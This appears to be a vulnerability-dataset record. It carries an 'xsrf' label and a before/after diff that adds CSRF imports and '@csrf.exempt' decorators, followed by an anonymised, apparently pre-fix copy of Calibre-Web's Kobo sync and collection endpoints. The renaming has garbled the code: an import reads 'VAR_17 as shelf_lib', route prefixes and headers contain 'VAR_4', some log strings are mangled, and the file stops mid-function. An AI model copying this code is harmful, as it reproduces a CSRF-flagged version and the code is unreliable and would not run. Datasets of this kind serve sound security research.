        "userguide_host": "https://kbdownload1-a.akamaihd.net",
        "wishlist_page": "https://store.kobobooks.com/{region}/{language}/account/wishlist",
    }
| xsrf | {
"code": [
"from . import config, logger, kobo_auth, db, calibre_db, helper, shelf as shelf_lib, ub"
],
"line_no": [
50
]
} | {
"code": [
"from . import config, logger, kobo_auth, db, calibre_db, helper, shelf as shelf_lib, ub, csrf",
"@csrf.exempt",
"@csrf.exempt",
"@csrf.exempt",
"@csrf.exempt",
"@csrf.exempt",
"@csrf.exempt"
],
"line_no": [
51,
509,
599,
629,
989,
1000,
1034
]
} |
import base64
import datetime
import sys
import os
import uuid
from time import gmtime, strftime
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
from flask import (
Blueprint,
request,
make_response,
jsonify,
current_app,
url_for,
redirect,
abort
)
from flask_login import current_user
from werkzeug.datastructures import Headers
from sqlalchemy import func
from sqlalchemy.sql.expression import and_, or_
from sqlalchemy.exc import StatementError
from sqlalchemy.sql import select
import requests
from . import config, logger, kobo_auth, db, calibre_db, helper, VAR_17 as shelf_lib, ub
from .constants import sqlalchemy_version2
from .helper import get_download_link
from .services import SyncToken as SyncToken
from .web import download_required
from .kobo_auth import requires_kobo_auth, get_auth_token
# Mapping of calibre source format -> acceptable Kobo delivery formats.
VAR_0 = {"KEPUB": ["KEPUB"], "EPUB": ["EPUB3", "EPUB"]}
# Kobo store API and cover-image host endpoints.
VAR_1 = "https://storeapi.kobo.com"
VAR_2 = "https://kbimages1-a.akamaihd.net"
# Maximum number of books handled per sync request (pagination size).
VAR_3 = 100
# Blueprint carrying all /kobo/<auth_token>/... routes.
VAR_4 = Blueprint("kobo", __name__, url_prefix="/VAR_4/<auth_token>")
kobo_auth.disable_failed_auth_redirect_for_blueprint(VAR_4)
kobo_auth.register_url_value_preprocessor(VAR_4)
# Module-level logger.
VAR_5 = logger.create()
def FUNC_0():
    """Translate the current request path into the matching Kobo store URL.

    The path segment after "/VAR_4/" begins with the auth token; the token
    is stripped and the remainder is appended to the store API base URL.
    """
    remainder = request.full_path.rpartition("/VAR_4/")[2]
    store_path = remainder.rstrip("?").partition("/")[2]
    return VAR_1 + "/" + store_path
# Hop-by-hop headers that must not be relayed from the proxied Kobo store
# response back to the device.
VAR_6 = [
    "connection",
    "content-encoding",
    "content-length",
    "transfer-encoding",
]
def FUNC_1():
    """Return whether Kobo sync is enabled in the server configuration."""
    return config.config_kobo_sync
def FUNC_2(VAR_7=None):
    """Forward the current request to the Kobo store and return the response.

    VAR_7: optional SyncToken whose store-side portion is copied into the
    outgoing request headers.
    """
    VAR_34 = Headers(request.headers)
    # Drop Host so `requests` sets the correct one for the store endpoint.
    VAR_34.remove("Host")
    if VAR_7:
        VAR_7.set_kobo_store_header(VAR_34)
    VAR_35 = requests.request(
        method=request.method,
        url=FUNC_0(),
        headers=VAR_34,
        data=request.get_data(),
        allow_redirects=False,
        timeout=(2, 10)
    )
    return VAR_35
def FUNC_3():
    """Proxy the request to the Kobo store when proxying is enabled,
    otherwise answer with an empty JSON object.

    GETs are answered with a 307 redirect to the store; other methods are
    forwarded and the store's reply is relayed minus hop-by-hop headers.
    """
    if config.config_kobo_proxy:
        if request.method == "GET":
            return redirect(FUNC_0(), 307)
        else:
            VAR_35 = FUNC_2()
            VAR_78 = VAR_35.headers
            for header_key in VAR_6:
                VAR_78.pop(header_key, default=None)
            return make_response(
                VAR_35.content, VAR_35.status_code, VAR_78.items()
            )
    else:
        return make_response(jsonify({}))
def FUNC_4(VAR_8):
    """Format a datetime as the UTC timestamp string Kobo expects,
    falling back to 'now' when the value is not datetime-like."""
    kobo_format = "%Y-%m-%dT%H:%M:%SZ"
    try:
        return VAR_8.strftime(kobo_format)
    except AttributeError as exc:
        VAR_5.debug("Timestamp not valid: {}".format(exc))
        return datetime.datetime.now().strftime(kobo_format)
@VAR_4.route("/v1/library/sync")
@requires_kobo_auth
@download_required
def FUNC_5():
    """Serve the Kobo library-sync endpoint.

    Collects new/changed entitlements and reading states since the
    timestamps carried in the device's SyncToken (optionally restricted
    to Kobo-sync-enabled shelves), advances the token's high-water marks
    and returns the (possibly store-merged) sync response.

    Fixes: the query variable was referenced via the undefined names
    `changed_entries` and `max_change` (rename leftovers) which raised
    NameError at runtime; both now use the bound names VAR_64 / VAR_41.
    """
    VAR_7 = SyncToken.SyncToken.from_headers(request.headers)
    VAR_5.info("Kobo library sync request received.")
    VAR_5.debug("SyncToken: {}".format(VAR_7))
    if not current_app.wsgi_app.is_proxied:
        VAR_5.debug('Kobo: Received unproxied request, changed request port to external server port')
    # High-water marks from the token; pushed forward while iterating.
    VAR_36 = VAR_7.books_last_modified
    VAR_37 = VAR_7.books_last_created
    VAR_38 = VAR_7.reading_state_last_modified
    VAR_39 = datetime.datetime.min
    VAR_9 = []
    calibre_db.reconnect_db(config, ub.app_DB_path)
    VAR_18 = current_user.kobo_only_shelves_sync
    if VAR_18:
        if sqlalchemy_version2:
            VAR_64 = select(db.Books,
                            ub.ArchivedBook.last_modified,
                            ub.BookShelf.date_added,
                            ub.ArchivedBook.is_archived)
        else:
            VAR_64 = calibre_db.session.query(db.Books,
                                              ub.ArchivedBook.last_modified,
                                              ub.BookShelf.date_added,
                                              ub.ArchivedBook.is_archived)
        # Books on kobo-sync shelves not yet synced to this user.
        VAR_64 = (VAR_64  # FIX: was the undefined name `changed_entries`
                  .join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
                  .join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
                  .filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
                              ub.KoboSyncedBooks.book_id == None))
                  .filter(ub.BookShelf.date_added > VAR_7.books_last_modified)
                  .filter(db.Data.format.in_(VAR_0))
                  .filter(calibre_db.common_filters())
                  .order_by(db.Books.id)
                  .order_by(ub.ArchivedBook.last_modified)
                  .join(ub.BookShelf, db.Books.id == ub.BookShelf.book_id)
                  .join(ub.Shelf)
                  .filter(ub.Shelf.user_id == current_user.id)
                  .filter(ub.Shelf.kobo_sync)
                  .distinct())
    else:
        if sqlalchemy_version2:
            VAR_64 = select(db.Books, ub.ArchivedBook.last_modified, ub.ArchivedBook.is_archived)
        else:
            VAR_64 = calibre_db.session.query(db.Books,
                                              ub.ArchivedBook.last_modified,
                                              ub.ArchivedBook.is_archived)
        VAR_64 = (VAR_64  # FIX: was the undefined name `changed_entries`
                  .join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
                  .join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
                  .filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
                              ub.KoboSyncedBooks.book_id == None))
                  .filter(calibre_db.common_filters())
                  .filter(db.Data.format.in_(VAR_0))
                  .order_by(db.Books.last_modified)
                  .order_by(db.Books.id))
    VAR_40 = []
    if sqlalchemy_version2:
        VAR_65 = calibre_db.session.execute(VAR_64.limit(VAR_3))
    else:
        VAR_65 = VAR_64.limit(VAR_3)
    for VAR_12 in VAR_65:
        FUNC_27(VAR_12.Books.id)
        VAR_66 = [data.format for data in VAR_12.Books.data]
        # Kepubify on the fly when only an EPUB exists and a converter is configured.
        if not 'KEPUB' in VAR_66 and config.config_kepubifypath and 'EPUB' in VAR_66:
            helper.convert_book_format(VAR_12.Books.id, config.config_calibre_dir, 'EPUB', 'KEPUB', current_user.name)
        VAR_22 = FUNC_28(VAR_12.Books.id)
        VAR_67 = {
            "BookEntitlement": FUNC_9(VAR_12.Books, VAR_14=(VAR_12.is_archived == True)),
            "BookMetadata": FUNC_16(VAR_12.Books),
        }
        if VAR_22.last_modified > VAR_7.reading_state_last_modified:
            VAR_67["ReadingState"] = FUNC_29(VAR_12.Books, VAR_22)
            VAR_38 = max(VAR_38, VAR_22.last_modified)
        VAR_40.append(VAR_12.Books.id)
        VAR_68 = VAR_12.Books.timestamp
        try:
            VAR_68 = max(VAR_68, VAR_12.date_added)
        except AttributeError:
            # Row has no date_added column (non-shelf query shape).
            pass
        if VAR_68 > VAR_7.books_last_created:
            VAR_9.append({"NewEntitlement": VAR_67})
        else:
            VAR_9.append({"ChangedEntitlement": VAR_67})
        VAR_36 = max(VAR_12.Books.last_modified, VAR_36)
        try:
            VAR_36 = max(VAR_36, VAR_12.date_added)
        except AttributeError:
            pass
        VAR_37 = max(VAR_68, VAR_37)
    if sqlalchemy_version2:
        VAR_41 = calibre_db.session.execute(VAR_64
                                            .filter(ub.ArchivedBook.is_archived)
                                            .order_by(func.datetime(ub.ArchivedBook.last_modified).desc()))\
            .columns(db.Books).first()
    else:
        VAR_41 = VAR_64.from_self().filter(ub.ArchivedBook.is_archived) \
            .order_by(func.datetime(ub.ArchivedBook.last_modified).desc()).first()
    # FIX: was `max_change.last_modified` — `max_change` is undefined here.
    VAR_41 = VAR_41.last_modified if VAR_41 else VAR_39
    VAR_39 = max(VAR_39, VAR_41)
    if sqlalchemy_version2:
        VAR_69 = calibre_db.session.execute(VAR_64).all()
        VAR_70 = len(VAR_69)
    else:
        VAR_70 = VAR_64.count()
    VAR_5.debug("Remaining VAR_65 to Sync: {}".format(VAR_70))
    # Reading states changed on books that were not part of the batch above.
    VAR_42 = ub.session.query(ub.KoboReadingState)
    if VAR_18:
        VAR_42 = VAR_42.join(ub.BookShelf,
                             ub.KoboReadingState.book_id == ub.BookShelf.book_id)\
            .join(ub.Shelf)\
            .filter(current_user.id == ub.Shelf.user_id)\
            .filter(ub.Shelf.kobo_sync,
                    or_(
                        func.datetime(ub.KoboReadingState.last_modified) > VAR_7.reading_state_last_modified,
                        func.datetime(ub.BookShelf.date_added) > VAR_7.books_last_modified
                    )).distinct()
    else:
        VAR_42 = VAR_42.filter(
            func.datetime(ub.KoboReadingState.last_modified) > VAR_7.reading_state_last_modified)
    VAR_42 = VAR_42.filter(
        and_(ub.KoboReadingState.user_id == current_user.id,
             ub.KoboReadingState.book_id.notin_(VAR_40)))
    for VAR_22 in VAR_42.all():
        VAR_12 = calibre_db.session.query(db.Books).filter(db.Books.id == VAR_22.book_id).one_or_none()
        if VAR_12:
            VAR_9.append({
                "ChangedReadingState": {
                    "ReadingState": FUNC_29(VAR_12, VAR_22)
                }
            })
            VAR_38 = max(VAR_38, VAR_22.last_modified)
    FUNC_22(VAR_7, VAR_9, VAR_18)
    VAR_7.books_last_created = VAR_37
    VAR_7.books_last_modified = VAR_36
    VAR_7.archive_last_modified = VAR_39
    VAR_7.reading_state_last_modified = VAR_38
    return FUNC_6(VAR_7, VAR_9, VAR_70)
def FUNC_6(VAR_7, VAR_9, VAR_10=False):
    """Finalize a sync response: optionally merge the Kobo store's own sync
    data (when proxying is enabled), set sync headers and build the reply.

    VAR_7: SyncToken serialized into the response headers.
    VAR_9: list of sync result entries collected so far (mutated in place).
    VAR_10: truthy when more books remain -> sets the 'continue' sync header.
    """
    VAR_43 = {}
    if config.config_kobo_proxy:
        try:
            VAR_35 = FUNC_2(VAR_7)
            VAR_79 = VAR_35.json()
            VAR_9 += VAR_79
            VAR_7.merge_from_store_response(VAR_35)
            VAR_43["x-VAR_4-sync"] = VAR_35.headers.get("x-VAR_4-sync")
            VAR_43["x-VAR_4-sync-mode"] = VAR_35.headers.get("x-VAR_4-sync-mode")
            VAR_43["x-VAR_4-recent-reads"] = VAR_35.headers.get("x-VAR_4-recent-reads")
        except Exception as ex:
            # Proxy failure is non-fatal: serve the local results only.
            VAR_5.error("Failed to receive or parse VAR_44 from Kobo's sync endpoint: {}".format(ex))
    if VAR_10:
        VAR_43["x-VAR_4-sync"] = "continue"
    VAR_7.to_headers(VAR_43)
    VAR_44 = make_response(jsonify(VAR_9), VAR_43)
    return VAR_44
@VAR_4.route("/v1/library/<VAR_11>/metadata")
@requires_kobo_auth
@download_required
def FUNC_7(VAR_11):
    """Return the Kobo metadata payload for the book with uuid VAR_11,
    proxying/ignoring the request when the book is unknown locally."""
    if not current_app.wsgi_app.is_proxied:
        VAR_5.debug('Kobo: Received unproxied request, changed request port to external server port')
    VAR_5.info("Kobo library VAR_45 request received for VAR_12 %s" % VAR_11)
    VAR_12 = calibre_db.get_book_by_uuid(VAR_11)
    if not VAR_12 or not VAR_12.data:
        VAR_5.info(u"Book %s not found in database", VAR_11)
        return FUNC_3()
    VAR_45 = FUNC_16(VAR_12)
    return jsonify([VAR_45])
def FUNC_8(VAR_12, VAR_13):
    """Build the download URL for book VAR_12 in format VAR_13.

    When the app is not behind a proxy the URL is built manually against
    the configured external port; otherwise Flask's url_for is used.

    Fix: the body referenced the undefined name `book_format` (a rename
    leftover) instead of the parameter VAR_13, raising NameError at runtime.
    """
    if not current_app.wsgi_app.is_proxied:
        # Strip the port from the host header (but not from a bare IPv6 literal).
        if ':' in request.host and not request.host.endswith(']'):
            VAR_80 = "".join(request.host.split(':')[:-1])
        else:
            VAR_80 = request.host
        return "{url_scheme}://{url_base}:{url_port}/VAR_4/{auth_token}/download/{VAR_21}/{VAR_13}".format(
            url_scheme=request.scheme,
            url_base=VAR_80,
            url_port=config.config_external_port,
            auth_token=get_auth_token(),
            VAR_21=VAR_12.id,
            VAR_13=VAR_13.lower()  # FIX: was the undefined name `book_format`
        )
    return url_for(
        "kobo.download_book",
        auth_token=kobo_auth.get_auth_token(),
        VAR_21=VAR_12.id,
        VAR_13=VAR_13.lower(),  # FIX: was the undefined name `book_format`
        _external=True,
    )
def FUNC_9(VAR_12, VAR_14):
    """Build the Kobo BookEntitlement payload for a book record.

    VAR_14 flags the entitlement as removed (archived on the device).
    """
    book_uuid = VAR_12.uuid
    entitlement = {
        "Accessibility": "Full",
        "ActivePeriod": {"From": FUNC_4(datetime.datetime.now())},
        "Created": FUNC_4(VAR_12.timestamp),
        "CrossRevisionId": book_uuid,
        "Id": book_uuid,
        "IsRemoved": VAR_14,
        "IsHiddenFromArchive": False,
        "IsLocked": False,
        "LastModified": FUNC_4(VAR_12.last_modified),
        "OriginCategory": "Imported",
        "RevisionId": book_uuid,
        "Status": "Active",
    }
    return entitlement
def FUNC_10():
    """Return the current UTC time in Kobo's timestamp format."""
    now_utc = gmtime()
    return strftime("%Y-%m-%dT%H:%M:%SZ", now_utc)
def FUNC_11(VAR_12):
    """Return the book's first comment text, or None when it has no comments."""
    comments = VAR_12.comments
    if not comments:
        return None
    return comments[0].text
def FUNC_12(VAR_12):
    """Build the Contributors / ContributorRoles metadata for a book.

    A single author is reported as a scalar name; several authors as a list.
    """
    if not VAR_12.authors:
        return {"Contributors": None}
    if len(VAR_12.authors) == 1:
        only_author = VAR_12.authors[0].name
        return {"ContributorRoles": [{"Name": only_author, "Role": "Author"}], "Contributors": only_author}
    author_names = [author.name for author in VAR_12.authors]
    roles = [{"Name": name, "Role": "Author"} for name in author_names]
    return {"ContributorRoles": roles, "Contributors": author_names}
def FUNC_13(VAR_12):
    """Return the book's first publisher name, or None when it has none."""
    publishers = VAR_12.publishers
    return publishers[0].name if publishers else None
def FUNC_14(VAR_12):
    """Return the book's first series name, or None when it is not in a series."""
    series = VAR_12.series
    return series[0].name if series else None
def FUNC_15(VAR_12):
    """Return the book's series index, falling back to 1 when unset or zero."""
    index = VAR_12.series_index
    if index:
        return index
    return 1
def FUNC_16(VAR_12):
    """Assemble the full Kobo metadata dict for *VAR_12*, including download URLs."""
    download_urls = []
    kepub_entries = [data for data in VAR_12.data if data.format == 'KEPUB']
    # Prefer KEPUB files when available; otherwise offer every stored format.
    for book_data in (kepub_entries or VAR_12.data):
        if book_data.format in VAR_0:
            for kobo_format in VAR_0[book_data.format]:
                download_urls.append(
                    {
                        "Format": kobo_format,
                        "Size": book_data.uncompressed_size,
                        "Url": FUNC_8(VAR_12, book_data.format),
                        "Platform": "Generic",
                    }
                )
    book_uuid = VAR_12.uuid
    metadata = {
        "Categories": ["00000000-0000-0000-0000-000000000001", ],
        "CoverImageId": book_uuid,
        "CrossRevisionId": book_uuid,
        "CurrentDisplayPrice": {"CurrencyCode": "USD", "TotalAmount": 0},
        "CurrentLoveDisplayPrice": {"TotalAmount": 0},
        "Description": FUNC_11(VAR_12),
        "DownloadUrls": download_urls,
        "EntitlementId": book_uuid,
        "ExternalIds": [],
        "Genre": "00000000-0000-0000-0000-000000000001",
        "IsEligibleForKoboLove": False,
        "IsInternetArchive": False,
        "IsPreOrder": False,
        "IsSocialEnabled": True,
        "Language": "en",
        "PhoneticPronunciations": {},
        "PublicationDate": VAR_12.pubdate,
        "Publisher": {"Imprint": "", "Name": FUNC_13(VAR_12),},
        "RevisionId": book_uuid,
        "Title": VAR_12.title,
        "WorkId": book_uuid,
    }
    metadata.update(FUNC_12(VAR_12))
    series_name = FUNC_14(VAR_12)
    if series_name:
        if sys.version_info < (3, 0):
            series_name = series_name.encode("utf-8")  # uuid3 wants bytes on Python 2
        metadata["Series"] = {
            "Name": FUNC_14(VAR_12),
            "Number": FUNC_15(VAR_12),  # ToDo Check int() ?
            "NumberFloat": float(FUNC_15(VAR_12)),
            # Deterministic series id derived from the series name.
            "Id": uuid.uuid3(uuid.NAMESPACE_DNS, series_name),
        }
    return metadata
@VAR_4.route("/v1/library/tags", methods=["POST", "DELETE"])
@requires_kobo_auth
def FUNC_17():
    """Create a Kobo collection (a shelf) from the posted Name/Items payload.

    DELETE on the collection list endpoint is not supported (405). Returns the
    shelf uuid with status 201 on success.
    """
    if request.method == "DELETE":
        abort(405)
    VAR_48, VAR_16 = None, None
    try:
        VAR_73 = request.json
        VAR_48 = VAR_73["Name"]
        VAR_16 = VAR_73["Items"]
        if not VAR_48:
            raise TypeError
    except (KeyError, TypeError):
        VAR_5.debug("Received malformed v1/library/tags request.")
        abort(400, description="Malformed tags POST request. Data has empty 'Name', missing 'Name' or 'Items' field")
    VAR_17 = ub.session.query(ub.Shelf).filter(ub.Shelf.name == VAR_48, ub.Shelf.user_id ==
                                               current_user.id).one_or_none()
    if VAR_17 and not shelf_lib.check_shelf_edit_permissions(VAR_17):
        abort(401, description="User is unauthaurized to create VAR_17.")
    if not VAR_17:
        # fix: was `VAR_48=name` — `name` is undefined here (NameError); the Shelf
        # constructor keyword is `name` and the value is the parsed shelf name.
        VAR_17 = ub.Shelf(user_id=current_user.id, name=VAR_48, uuid=str(uuid.uuid4()))
        ub.session.add(VAR_17)
    VAR_49 = FUNC_19(VAR_16, VAR_17)
    if VAR_49:
        VAR_5.debug("Received request to add unknown VAR_65 to a collection. Silently ignoring VAR_16.")
    ub.session_commit()
    return make_response(jsonify(str(VAR_17.uuid)), 201)
@VAR_4.route("/v1/library/tags/<VAR_15>", methods=["DELETE", "PUT"])
@requires_kobo_auth
def FUNC_18(VAR_15):
    """Delete (DELETE) or rename (PUT) the collection identified by *VAR_15*."""
    VAR_17 = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == VAR_15,
                                               ub.Shelf.user_id == current_user.id).one_or_none()
    if not VAR_17:
        VAR_5.debug("Received Kobo VAR_53 update request on a collection unknown to CalibreWeb")
        if config.config_kobo_proxy:
            return FUNC_3()
        abort(404, description="Collection isn't known to CalibreWeb")
    if not shelf_lib.check_shelf_edit_permissions(VAR_17):
        abort(401, description="User is unauthaurized to edit VAR_17.")
    if request.method == "DELETE":
        shelf_lib.delete_shelf_helper(VAR_17)
    else:
        try:
            new_name = request.json["Name"]
        except (KeyError, TypeError):
            VAR_5.debug("Received malformed v1/library/tags rename request.")
            abort(400, description="Malformed tags POST request. Data is missing 'Name' field")
        VAR_17.name = new_name
        ub.session.merge(VAR_17)
    ub.session_commit()
    return make_response(' ', 200)
def FUNC_19(VAR_16, VAR_17):
    """Add the Kobo tag items in *VAR_16* to shelf *VAR_17*.

    Items already on the shelf are skipped. Returns the items that could not
    be resolved to a known book (wrong type, unknown uuid, or missing keys).
    """
    VAR_50 = set([book_shelf.book_id for book_shelf in VAR_17.books])
    VAR_49 = []
    for item in VAR_16:
        try:
            if item["Type"] != "ProductRevisionTagItem":
                VAR_49.append(item)
                continue
            VAR_12 = calibre_db.get_book_by_uuid(item["RevisionId"])
            if not VAR_12:
                VAR_49.append(item)
                continue
            VAR_21 = VAR_12.id
            if VAR_21 not in VAR_50:
                # fix: was `ub.BookShelf(VAR_21=book_id)` — `book_id` is undefined
                # here (NameError); the constructor keyword is `book_id` and the
                # value is the resolved book id.
                VAR_17.books.append(ub.BookShelf(book_id=VAR_21))
        except KeyError:
            VAR_49.append(item)
    return VAR_49
@VAR_4.route("/v1/library/tags/<VAR_15>/items", methods=["POST"])
@requires_kobo_auth
def FUNC_20(VAR_15):
    """Add the posted items to the collection identified by *VAR_15*."""
    try:
        posted_items = request.json["Items"]
    except (KeyError, TypeError):
        VAR_5.debug("Received malformed v1/library/tags/<VAR_15>/VAR_16/delete request.")
        abort(400, description="Malformed tags POST request. Data is missing 'Items' field")
    target_shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == VAR_15,
                                                     ub.Shelf.user_id == current_user.id).one_or_none()
    if not target_shelf:
        VAR_5.debug("Received Kobo request on a collection unknown to CalibreWeb")
        abort(404, description="Collection isn't known to CalibreWeb")
    if not shelf_lib.check_shelf_edit_permissions(target_shelf):
        abort(401, description="User is unauthaurized to edit VAR_17.")
    unresolved = FUNC_19(posted_items, target_shelf)
    if unresolved:
        VAR_5.debug("Received request to add an unknown VAR_12 to a collection. Silently ignoring item.")
    ub.session.merge(target_shelf)
    ub.session_commit()
    return make_response('', 201)
@VAR_4.route("/v1/library/tags/<VAR_15>/VAR_16/delete", methods=["POST"])
@requires_kobo_auth
def FUNC_21(VAR_15):
    """Remove the posted items from the collection identified by *VAR_15*."""
    VAR_16 = None
    try:
        VAR_74 = request.json
        VAR_16 = VAR_74["Items"]
    except (KeyError, TypeError):
        VAR_5.debug("Received malformed v1/library/tags/<VAR_15>/VAR_16/delete request.")
        abort(400, description="Malformed tags POST request. Data is missing 'Items' field")
    VAR_17 = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == VAR_15,
                                               ub.Shelf.user_id == current_user.id).one_or_none()
    if not VAR_17:
        VAR_5.debug(
            "Received a request to remove an item from a Collection unknown to CalibreWeb.")
        abort(404, description="Collection isn't known to CalibreWeb")
    if not shelf_lib.check_shelf_edit_permissions(VAR_17):
        abort(401, description="User is unauthaurized to edit VAR_17.")
    # Items that cannot be matched to a known book are collected and ignored.
    VAR_49 = []
    for item in VAR_16:
        try:
            if item["Type"] != "ProductRevisionTagItem":
                VAR_49.append(item)
                continue
            VAR_12 = calibre_db.get_book_by_uuid(item["RevisionId"])
            if not VAR_12:
                VAR_49.append(item)
                continue
            # Delete the shelf link for this book directly on the relationship query.
            VAR_17.books.filter(ub.BookShelf.book_id == VAR_12.id).delete()
        except KeyError:
            VAR_49.append(item)
    ub.session_commit()
    if VAR_49:
        VAR_5.debug("Received request to remove an unknown VAR_12 to a collecition. Silently ignoring item.")
    return make_response('', 200)
def FUNC_22(VAR_7, VAR_9, VAR_18=False):
    """Append collection (tag) changes since the sync token to *VAR_9*.

    VAR_7: the client's SyncToken; its tags_last_modified is advanced here.
    VAR_9: the sync-results list being assembled by the caller.
    VAR_18: when True, restrict syncing to shelves flagged for Kobo sync and
    report the others to the device as deleted tags.
    """
    VAR_51 = VAR_7.tags_last_modified
    # Shelves archived since the last sync become DeletedTag entries.
    for VAR_17 in ub.session.query(ub.ShelfArchive).filter(
        func.datetime(ub.ShelfArchive.last_modified) > VAR_7.tags_last_modified,
        ub.ShelfArchive.user_id == current_user.id
    ):
        VAR_51 = max(VAR_17.last_modified, VAR_51)
        VAR_9.append({
            "DeletedTag": {
                "Tag": {
                    "Id": VAR_17.uuid,
                    "LastModified": FUNC_4(VAR_17.last_modified)
                }
            }
        })
    VAR_52 = []
    if VAR_18:
        for VAR_17 in ub.session.query(ub.Shelf).filter(
            func.datetime(ub.Shelf.last_modified) > VAR_7.tags_last_modified,
            ub.Shelf.user_id == current_user.id,
            # NOTE(review): Python `not` applied to a SQLAlchemy column does not
            # build a SQL expression — this looks like it was meant to be
            # `ub.Shelf.kobo_sync == False` (or `~ub.Shelf.kobo_sync`); confirm.
            not ub.Shelf.kobo_sync
        ):
            VAR_9.append({
                "DeletedTag": {
                    "Tag": {
                        "Id": VAR_17.uuid,
                        "LastModified": FUNC_4(VAR_17.last_modified)
                    }
                }
            })
        # Extra criterion applied to the changed-shelves query below.
        VAR_52.append(ub.Shelf.kobo_sync)
    # Shelves whose metadata or membership changed since the token.
    if sqlalchemy_version2:
        VAR_75 = ub.session.execute(select(ub.Shelf).outerjoin(ub.BookShelf).filter(
            or_(func.datetime(ub.Shelf.last_modified) > VAR_7.tags_last_modified,
                func.datetime(ub.BookShelf.date_added) > VAR_7.tags_last_modified),
            ub.Shelf.user_id == current_user.id,
            *VAR_52
        ).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())).columns(ub.Shelf)
    else:
        VAR_75 = ub.session.query(ub.Shelf).outerjoin(ub.BookShelf).filter(
            or_(func.datetime(ub.Shelf.last_modified) > VAR_7.tags_last_modified,
                func.datetime(ub.BookShelf.date_added) > VAR_7.tags_last_modified),
            ub.Shelf.user_id == current_user.id,
            *VAR_52
        ).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())
    for VAR_17 in VAR_75:
        if not shelf_lib.check_shelf_view_permissions(VAR_17):
            continue
        VAR_51 = max(VAR_17.last_modified, VAR_51)
        VAR_53 = FUNC_23(VAR_17)
        if not VAR_53:
            continue
        # Shelves created after the token are new tags; others are changed tags.
        if VAR_17.created > VAR_7.tags_last_modified:
            VAR_9.append({
                "NewTag": VAR_53
            })
        else:
            VAR_9.append({
                "ChangedTag": VAR_53
            })
    VAR_7.tags_last_modified = VAR_51
    ub.session_commit()
def FUNC_23(VAR_17):
    """Serialize shelf *VAR_17* into Kobo's tag representation ({"Tag": ...})."""
    tag_items = []
    for book_shelf in VAR_17.books:
        VAR_12 = calibre_db.get_book(book_shelf.book_id)
        if not VAR_12:
            VAR_5.info(u"Book (id: %s) in BookShelf (id: %s) not found in VAR_12 database", book_shelf.book_id, VAR_17.id)
            continue
        tag_items.append(
            {
                "RevisionId": VAR_12.uuid,
                "Type": "ProductRevisionTagItem"
            }
        )
    tag = {
        "Created": FUNC_4(VAR_17.created),
        "Id": VAR_17.uuid,
        "Items": tag_items,
        "LastModified": FUNC_4(VAR_17.last_modified),
        "Name": VAR_17.name,
        "Type": "UserTag"
    }
    return {"Tag": tag}
@VAR_4.route("/v1/library/<VAR_11>/state", methods=["GET", "PUT"])
@requires_kobo_auth
def FUNC_24(VAR_11):
    """Read (GET) or update (PUT) the Kobo reading state of book *VAR_11*."""
    VAR_12 = calibre_db.get_book_by_uuid(VAR_11)
    if not VAR_12 or not VAR_12.data:
        VAR_5.info(u"Book %s not found in database", VAR_11)
        # Unknown book: proxy to the real store (if enabled) or answer {}.
        return FUNC_3()
    # Fetch (or lazily create) this user's reading state for the book.
    VAR_22 = FUNC_28(VAR_12.id)
    if request.method == "GET":
        return jsonify([FUNC_29(VAR_12, VAR_22)])
    else:
        VAR_76 = {"EntitlementId": VAR_11}
        try:
            VAR_81 = request.json
            # Kobo sends a list of reading states; only the first is applied.
            VAR_82 = VAR_81["ReadingStates"][0]
            VAR_83 = VAR_82["CurrentBookmark"]
            if VAR_83:
                VAR_25 = VAR_22.current_bookmark
                VAR_25.progress_percent = VAR_83["ProgressPercent"]
                VAR_25.content_source_progress_percent = VAR_83["ContentSourceProgressPercent"]
                VAR_87 = VAR_83["Location"]
                if VAR_87:
                    VAR_25.location_value = VAR_87["Value"]
                    VAR_25.location_type = VAR_87["Type"]
                    VAR_25.location_source = VAR_87["Source"]
                VAR_76["CurrentBookmarkResult"] = {"Result": "Success"}
            VAR_84 = VAR_82["Statistics"]
            if VAR_84:
                VAR_24 = VAR_22.statistics
                VAR_24.spent_reading_minutes = int(VAR_84["SpentReadingMinutes"])
                VAR_24.remaining_time_minutes = int(VAR_84["RemainingTimeMinutes"])
                VAR_76["StatisticsResult"] = {"Result": "Success"}
            VAR_85 = VAR_82["StatusInfo"]
            if VAR_85:
                VAR_23 = VAR_22.book_read_link
                VAR_88 = FUNC_26(VAR_85["Status"])
                # Count a new reading session only on a transition into
                # "in progress" from a different status.
                if VAR_88 == ub.ReadBook.STATUS_IN_PROGRESS \
                        and VAR_88 != VAR_23.read_status:
                    VAR_23.times_started_reading += 1
                    VAR_23.last_time_started_reading = datetime.datetime.utcnow()
                VAR_23.read_status = VAR_88
                VAR_76["StatusInfoResult"] = {"Result": "Success"}
        except (KeyError, TypeError, ValueError, StatementError):
            VAR_5.debug("Received malformed v1/library/<VAR_11>/state request.")
            ub.session.rollback()
            abort(400, description="Malformed request data is missing 'ReadingStates' key")
        ub.session.merge(VAR_22)
        ub.session_commit()
        return jsonify({
            "RequestResult": "Success",
            "UpdateResults": [VAR_76],
        })
def FUNC_25(VAR_19):
    """Translate a ub.ReadBook read_status into Kobo's status string."""
    kobo_status_by_read_status = {
        None: "ReadyToRead",
        ub.ReadBook.STATUS_UNREAD: "ReadyToRead",
        ub.ReadBook.STATUS_FINISHED: "Finished",
        ub.ReadBook.STATUS_IN_PROGRESS: "Reading",
    }
    return kobo_status_by_read_status[VAR_19.read_status]
def FUNC_26(VAR_20):
    """Translate Kobo's reading-status string into the ub.ReadBook constant."""
    read_status_by_kobo_status = {
        None: None,
        "ReadyToRead": ub.ReadBook.STATUS_UNREAD,
        "Finished": ub.ReadBook.STATUS_FINISHED,
        "Reading": ub.ReadBook.STATUS_IN_PROGRESS,
    }
    return read_status_by_kobo_status[VAR_20]
def FUNC_27(VAR_21):
    """Record that book *VAR_21* has been synced to the current user's Kobo."""
    synced_entry = ub.KoboSyncedBooks()
